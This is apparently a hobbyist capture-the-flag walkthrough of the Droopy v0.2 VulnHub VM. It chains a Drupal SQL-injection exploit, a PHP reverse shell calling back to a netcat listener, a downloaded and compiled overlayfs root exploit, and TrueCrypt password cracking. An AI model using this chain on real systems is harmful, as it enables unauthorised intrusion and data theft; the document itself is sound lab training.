Droopy v0.2

For my first ever VulnHub VM I’m going to dive into Droopy v0.2

To get started visit the Droopy v0.2 VulnHub page here
And download a copy of the VM here

The only 2 hints you’ll get are:

1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Special thanks go out to knightmare for all their work on this VM

Now first things first – start up the Droopy VM and if all goes to plan it should pick up a local IP from your DHCP server. In my case this will be in the 192.168.1.0/24 range

There are lots of different ways to scan your network and pick up hosts, some stealthier than others, but in my case I stuck to the reliable Swiss army knife nmap and just did a basic ping scan

# nmap -sn 192.168.1.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-02 14:44 EDT
Nmap scan report for droopy.home (192.168.1.82)

Right, now that we know our target, what next? Enumerate, of course! Back to nmap for a quick check of which ports are open and what services are running on this host. Again there are lots of options, and it's always worth reading other walkthroughs to see how others approach each hurdle.

# nmap -A 192.168.1.82

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-02 15:49 EDT
Nmap scan report for droopy.home (192.168.1.82)
Host is up (0.0013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 08:00:27:EA:17:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0
Network Distance: 1 hop

Based on the nmap results we know the VM has the following;

– Port 80/tcp open
– Apache httpd 2.4.7 ((Ubuntu))
– Drupal 7
– List of interesting files and folders extracted from http-robots.txt

Given that port 80 is open, a quick look at http://192.168.1.82 shows us a logon page. Reviewing our nmap enumeration, the robots.txt entries include a file called CHANGELOG.txt, which could be interesting. Drupal lists its newest release at the top of that file, so after a quick review we can reasonably assume the web server is running "Drupal 7.30, 2014-07-24".

NOTE – It's worth mentioning that I did try brute forcing the logon at this point with no success: within a minute my IP was locked out. I'm not sure for how long, as I just reverted the VM and went back to work. Drupal 7's built-in flood control does this by default (roughly 50 failed logins per IP per hour, and 5 per account per six hours), so online password guessing against a Drupal login form is rarely the quickest way in.

So this is good. We have a definite starting point in which to base our attack. Now comes the essential part – more research.

A quick search on https://exploit-db.com for Drupal 7 reveals a potential SQL injection vector. Let's give it a try.

Drupal Core <= 7.32 – SQL Injection (2)
EDB-ID: 34992
CVE: 2014-3704…
OSVDB-ID: 113371
Author: Claudio Viviani
Published: 2014-10-17
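As an added example (not part of the original write-up), here is a small POSIX shell script that does the CHANGELOG.txt check from above mechanically: it pulls the first "Drupal X.Y" line out of the changelog and tests whether the version is below 7.32, the release that fixed SA-CORE-2014-005 / CVE-2014-3704. The changelog text is a constructed sample so the script runs offline; against the live host you would pipe `curl -s http://192.168.1.82/CHANGELOG.txt` into the same function.

```shell
#!/bin/sh
# Added example, not from the original write-up. Extract the installed
# Drupal version from CHANGELOG.txt and test it against the 7.32 fix for
# SA-CORE-2014-005 (CVE-2014-3704). Against the live target you would run:
#   curl -s http://192.168.1.82/CHANGELOG.txt | drupal_version_from_changelog

# Read a changelog on stdin and print the version from the first
# "Drupal X.Y, YYYY-MM-DD" line (Drupal lists the newest release first).
drupal_version_from_changelog() {
    grep -m1 -E '^Drupal [0-9]+\.[0-9]+' \
        | sed -E 's/^Drupal ([0-9]+\.[0-9]+).*/\1/'
}

# Exit 0 if the version is a 7.x release older than 7.32, which is the
# range the advisory lists as affected; exit 1 otherwise.
drupal7_sqli_in_scope() {
    major=${1%%.*}
    minor=${1#*.}
    [ "$major" = 7 ] && [ "$minor" -lt 32 ]
}

# Constructed sample: the head of a Drupal 7.30 CHANGELOG.txt.
SAMPLE_CHANGELOG='Drupal 7.30, 2014-07-24
-----------------------
- Fixed a regression introduced in Drupal 7.29 ...

Drupal 7.29, 2014-07-16
-----------------------
- Fixed security issues ...'

version=$(printf '%s\n' "$SAMPLE_CHANGELOG" | drupal_version_from_changelog)
if drupal7_sqli_in_scope "$version"; then
    echo "Drupal $version: in scope for CVE-2014-3704, try EDB-ID 34992"
else
    echo "Drupal $version: at or above 7.32, look elsewhere"
fi
```

The version test is deliberately narrow: a site that has had CHANGELOG.txt removed, or that was patched with the one-line fix from the advisory without bumping the version, will not be classified correctly, so the script's answer is a reason to try the exploit, not proof that it will work.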

From a terminal we need to wget the exploit, make it executable and then run it against our target (the script takes the target URL plus the username and password for the account it will create):

# wget -O 34992.py https://www.exploit-db.com/download/34992
# chmod 755 34992.py
# python ./34992.py -t http://192.168.1.82 -u 8bit -p 8bit

If all goes well, we should now have a new Drupal account on the server and the script reports that the user was created.

So where to next? At this point it's a good idea to reward yourself with a cold beer, but don't get too carried away, this journey has only just begun. The next step is to log on with our newly created credentials and see what our options are. I have never used Drupal before, so it's a good time to explore and get the lay of the land.

After a bit of casual strolling through the various settings I noticed a module called 'PHP Filter'. The description reads 'Allows embedded PHP code/snippets to be evaluated'. I'm pretty new to this, but that doesn't sound like a good thing: any account allowed to use that text format can run arbitrary PHP as the web server user, which is remote code execution by design.

I enabled the PHP filter, saved the configuration and then gave my newly created account the PHP code text format permission through the permissions link, making sure to click Save Permissions before continuing. Then I created a new post, set the text format to PHP code and pasted in the reverse shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Remember to change the following two settings, on lines 49 and 50 of this particular reverse shell, to your attacking machine's IP and to the port your listener will be waiting on (4747 below):

$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS

Then set up a netcat listener on your attacking machine with

# nc -nlvp 4747

Now, fingers crossed, post or preview your update, making sure the Text Format is set to 'PHP code'. If the code is good you should see a connection back to your attacking machine: we have a shell! It works in this scenario, but keep in mind that outbound firewalling (egress filtering) on a real target may prevent the reverse shell connection reaching you, so pick a port that is allowed out through the firewall (commonly 80 or 443) where possible.

I’ll do a separate post of Linux Post Exploitation commands, but in this case we’ll do a quick check of our current account with the id command

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

So the shell is running as www-data, the Apache user. While I'm here I also do a quick check of the kernel, hardware, etc. with

$ uname -a


So this is good isn’t it? We have a shell on the target machine, but we need more! We need to escalate our privileges and make sure we’re at the sharp end of the stick. So where do we go from here?

Before continuing I did a quick browse through the system, and based on the original VM clue "It's fun to read other people's email" the /var/mail/ directory caught my attention. So I took a quick peek at the file it contained and made some notes

$ ls /var/mail
$ cat /var/mail/www-data

The two observations that I took away from it were:

  • The password isn’t longer than 11 characters
  • We know what academy we went to

Based on this I decided to create a custom wordlist from the rockyou entries containing the word 'academy', BUT I screwed up and didn't notice my mistake. I basically ran the following

$ cat rockyou.txt |grep acadamy >> daves_rockyou.txt

And that was my downfall. A serious lack of attention to detail, and that's always going to be your (my) downfall in this game. Long story short, when it came time to try and brute force the TrueCrypt container, it failed. My custom wordlist was based on 'acadamy' and what I should have typed was 'academy', so there's a lesson learnt there. But anyway, back to the here and now: I have some clues to work with from the email message in www-data, but I'm still not root, so let's move this along.

I needed to get back on track and get my bearings. First step for me is to check what the target is running and obtain the kernel version.

$ uname -r
3.13.0-43-generic

The resulting output breaks down as follows:

3 – major version
13 – minor version
0 – patch level (the upstream stable point release)
43 – Ubuntu's ABI/build number for the packaged kernel
generic – the kernel flavour

To establish what distro is running on the target machine I ran the following

$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

A quick search on www.exploit-db.com turns up a few options to explore, but the one chosen this time is the overlayfs local root exploit (EDB-ID 37292, CVE-2015-1328); full details and code are at https://www.exploit-db.com/exploits/37292/. It is listed for kernels 3.13.0 up to 3.19 on Ubuntu 12.04 through 15.04, which covers the 3.13.0-43 kernel found above.
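As an added example (not from the original post), the following shell functions do the uname -r interpretation above programmatically and compare the result with the kernel range the exploit-db entry for 37292 is titled for (3.13.0 up to, but not including, 3.19). The range is taken from that title; whether a particular distro build is still unpatched is a separate question, so treat a match as "worth trying", not "guaranteed root". The comparison values other than 3.13.0-43-generic are made up.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Split a `uname -r`
# string into major, minor, patch, distro ABI number and flavour, then check
# it against the kernel range EDB-ID 37292 (CVE-2015-1328, overlayfs) is
# listed for: 3.13.0 <= version < 3.19. Ubuntu backported the fix into later
# 3.13.0-ABI packages, so a hit means "try it", not "it will work".

# Print "major minor patch abi flavour" for a string like 3.13.0-43-generic.
parse_kernel_release() {
    rel=$1
    ver=${rel%%-*}               # 3.13.0
    rest=${rel#"$ver"}           # -43-generic (empty for a vanilla kernel)
    rest=${rest#-}               # 43-generic
    abi=${rest%%-*}              # 43
    flavour=${rest#"$abi"}       # -generic
    flavour=${flavour#-}         # generic
    major=${ver%%.*}
    minor_patch=${ver#*.}
    minor=${minor_patch%%.*}
    patch=${minor_patch#*.}
    [ "$patch" = "$minor_patch" ] && patch=0   # "4.4" has no patch field
    printf '%s %s %s %s %s\n' "$major" "$minor" "$patch" "$abi" "$flavour"
}

# Exit 0 if major.minor lies in [3.13, 3.19), the range in the exploit title.
overlayfs_37292_in_range() {
    set -- $(parse_kernel_release "$1")
    major=$1
    minor=$2
    [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]
}

# Stand-alone run: the release seen on the target plus two made-up values.
for r in 3.13.0-43-generic 3.19.0-25-generic 4.4.0-21-generic; do
    if overlayfs_37292_in_range "$r"; then
        echo "$r: in the 37292 range, try the overlayfs exploit"
    else
        echo "$r: outside the 37292 range"
    fi
done
```

On the target itself you would call `overlayfs_37292_in_range "$(uname -r)"`; the parsing is plain parameter expansion so it works in the minimal /bin/sh a reverse shell usually gives you.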

Next I right-click and copy the source link to download the exploit, then on the target run the following. My first attempt failed because www-data had no permission to write in the current directory, so I changed into /tmp and re-ran it; much better. gcc (GNU Compiler Collection) then compiles the source for execution. This assumes wget and gcc are installed on the target and that it can reach exploit-db; if not, fetch the file on your attacking machine and transfer it over.

$ cd /tmp
$ wget -O 37292.c https://www.exploit-db.com/download/37292

$ gcc 37292.c -o 37292
$ ./37292

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# python -c 'import pty ; pty.spawn("/bin/bash")'

# whoami
root

Bingo – that’s what we needed. We now have root on the target machine, but this roller coaster’s still moving so there’s no time to celebrate just yet. There’s more work to be done.

A quick peek in the /root folder shows a lonesome file called dave.tc, and a quick Google shows this to be a TrueCrypt virtual encrypted disk (container), so I decide to download it to my Kali box for further analysis. To do this I chose to move it into a web-accessible directory and then download it straight from a browser. Note, I should have used cp (copy) instead of mv (move): moving a file out of /root changes the target and is more likely to be noticed, and a copy gives the same result.

# mv dave.tc /var/www/html/dave.tc

Then in a browser I opened http://192.168.1.82/dave.tc to download the file

Now on my Kali box, and feeling exceedingly confident, I ran TrueCrack (a brute-force password cracker for TrueCrypt volumes) against the dave.tc container using my previously created custom wordlist. The -k flag selects the key derivation hash to try; sha512 turned out to be the right one here, but if it isn't known you have to try ripemd160 and whirlpool as well.

# truecrack -t dave.tc -k sha512 -w daves_rockyou.txt

And you guessed it. It failed. Oh dear. At this point I should have checked and picked up on the spelling mistake, but I didn't. So, confused but not defeated, I moved on to the other clue, that the password wasn't longer than 11 characters. I had another crack at it, this time generating a new list containing only the 11-character passwords from rockyou to minimise processing time, and crossed my fingers. (Strictly the hint only gives an upper bound, so -m 11 was a gamble that happened to pay off; dropping it and keeping just -M 11 would also have kept every shorter candidate.)

# pw-inspector -i rockyou.txt -m 11 -M 11 -o daves-11.txt
# truecrack -t dave.tc -k sha512 -w daves-11.txt -v

My own fault but I had to leave this to run overnight – yeah I’ve got a slow machine, but when I woke up in the morning with a fresh cup of coffee in hand, the password was smiling sweetly back at me – etonacademy
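The wordlist mistake above, and the second attempt with pw-inspector, both come down to filtering rockyou on the two clues from the mail. As an added example that is not the author's command, here is a shell function that applies both constraints (contains a word, no longer than a given length) in one go and refuses to produce an empty list, which is the check that would have caught 'acadamy' immediately. The mini rockyou it runs against is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not the author's command. Filter a wordlist on both hints
# from the mail (contains a word, no longer than N characters) and fail
# loudly when nothing matches, instead of silently writing an empty file.
#
# Usage: build_wordlist <word> <max length> < rockyou.txt > candidates.txt
build_wordlist() {
    word=$1
    maxlen=$2
    # -i: the mail gives the word, not its capitalisation.
    # awk keeps only lines of at most maxlen characters.
    matches=$(grep -i -- "$word" | awk -v max="$maxlen" 'length($0) <= max')
    if [ -z "$matches" ]; then
        echo "build_wordlist: no entries contain '$word' (typo?)" >&2
        return 1
    fi
    printf '%s\n' "$matches"
    echo "build_wordlist: $(printf '%s\n' "$matches" | wc -l | tr -d ' ') candidate(s) kept" >&2
}

# Constructed stand-in for rockyou.txt.
SAMPLE_ROCKYOU='123456
password
etonacademy
academyofart
westpointacademy
Academy2015
academy
royalacademy
iloveyou'

# The author's misspelling now stops with an error instead of producing an
# empty list that only fails hours later inside TrueCrack.
if ! printf '%s\n' "$SAMPLE_ROCKYOU" | build_wordlist acadamy 11 >/dev/null; then
    echo "misspelt pattern rejected, as intended"
fi

# Correct spelling plus the 11-character limit: three candidates survive.
printf '%s\n' "$SAMPLE_ROCKYOU" | build_wordlist academy 11
```

Against the real rockyou.txt, `build_wordlist academy 11 < rockyou.txt > daves.txt` replaces both the grep and the pw-inspector step, and the count printed on stderr tells you at a glance whether the list is worth feeding to TrueCrack.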

Now we have the password for the TrueCrypt container we need to mount it and see what we can find.

# cryptsetup open --type tcrypt dave.tc dave
Enter passphrase: etonacademy

Now this is where I have to apologise: the following steps worked for me, but being new to Linux I'm not sure this is the best way. I'll look more into it, but from here I made a new directory, /mnt/dave (the same name I gave the mapping in the cryptsetup step), in which to mount the volume, then ran the mount command. Two practical notes: mounting with -o ro avoids touching timestamps inside the container, and when you're finished, unmount it and close the mapping again with umount /mnt/dave followed by cryptsetup close dave.

# mkdir /mnt/dave
# mount /dev/mapper/dave /mnt/dave
# cd /mnt/dave
# ls -l
total 14
drwxr-xr-x 2 root root 1024 Apr 12 07:54 buller
drwx------ 2 root root 12288 Apr 12 07:53 lost+found
drwxr-xr-x 2 root root 1024 Apr 12 07:58 panama

At first glance the three directories hold very little: two small images, which don't seem suspicious (just yet), so before I waste too much time on steganography I'll do some more digging.

Ah. So I was running ls -a in the /mnt/dave/buller folder with no luck, then I ran it back in the /mnt/dave folder and found a hair in my milkshake: something I should have checked the first time around (mental note for the future).

# ls -la
drwxr-xr-x 4 8bit staff 136 12 Apr 13:02 .secret
drwxr-xr-x 3 8bit staff 102 12 Apr 12:54 buller
drwxr-xr-x 2 8bit staff 68 12 Apr 12:53 lost+found
drwxr-xr-x 3 8bit staff 102 12 Apr 12:58 panama

So this is interesting and unexpected: we have a new folder called .secret, so let's do some more digging. You won't catch me out twice. This time I did another ls -la inside .secret and there are two entries, one of them a hidden folder again

# ls -la
drwxr-xr-x 3 8bit staff 102 12 Apr 13:16 .top
-rw-r--r-- 1 8bit staff 61118 25 Feb 08:57 piers.png

BOOM! It's party pizza time. I was just about to start grabbing all the images out of this encrypted volume in preparation for further analysis, but there was no need (and I won't upload them here). I just took a look inside the /mnt/dave/.secret/.top folder and what do you know: flag.txt
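The .secret/.top find above took two rounds of ls -la, one directory at a time. As an added example (not the author's commands), the following shell function lists every dot-entry beneath a mount point recursively, so a nested hidden tree is visible in a single pass; the sample tree is built in a temporary directory to mirror the layout of dave.tc, with the file contents made up.

```shell
#!/bin/sh
# Added example, not from the original write-up. List every hidden entry
# (anything whose relative path contains a "/." component) beneath a
# directory, so .secret/.top/flag.txt is found in one pass rather than one
# ls -la per directory. The sample volume is constructed to mirror dave.tc.

# Print hidden entries beneath $1, relative to $1, one per line, sorted.
list_hidden() {
    # Run relative to the root so the pattern only sees paths such as
    # ./.secret/.top/flag.txt and never the root's own path components.
    # LC_ALL=C keeps the sort order byte-wise and predictable.
    (cd "$1" && find . -path '*/.*' | sed 's#^\./##' | LC_ALL=C sort)
}

# Build a throwaway tree with the directory names seen in the mounted
# container; the file contents are made up.
make_sample_volume() {
    dir=$(mktemp -d)
    mkdir -p "$dir/buller" "$dir/panama" "$dir/lost+found" "$dir/.secret/.top"
    : > "$dir/buller/photo1.jpg"
    : > "$dir/panama/photo2.jpg"
    : > "$dir/.secret/piers.png"
    echo 'flag{constructed-sample}' > "$dir/.secret/.top/flag.txt"
    printf '%s\n' "$dir"
}

# Stand-alone run: show what a plain `ls -l` at the top level would miss.
vol=$(make_sample_volume)
echo "hidden entries under $vol:"
list_hidden "$vol"
rm -rf "$vol"
```

On the real container, `list_hidden /mnt/dave` gives the whole hidden tree in one go; `find /mnt/dave -type f -exec file {} +` is the natural follow-up for deciding which of the images, if any, deserve a steganography pass.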


Short on time? Then here’s the summary

Gameplay:

Enumerate target and services
Gain access to Drupal with SQL Injection
Exploit Drupal with PHP Reverse Shell
Escalate to Root through Overlayfs exploit
Obtain and bruteforce access to TrueCrypt container
Pillage and capture hidden flag

Exploits used:

CVE-2014-3704 – Drupal 7 SQL Injection
PHP-Reverse-Shell
CVE-2015-1328 – Overlayfs Local Root

Websites, Tools and Commands Used:

https://www.exploit-db.com
http://pentestmonkey.net
nmap
wget
chmod
netcat (nc)
whoami
id
gcc
TrueCrack
pw-inspector
cryptsetup
mkdir
mount
ls

Well that feels good. Big shout out to the boys and girls at www.top-hat-sec.com: if you ever want to learn from passionate, like-minded people, this is the place to be. No rest for the wicked, time for a quick beer then on to the next VM


8bit kiwi
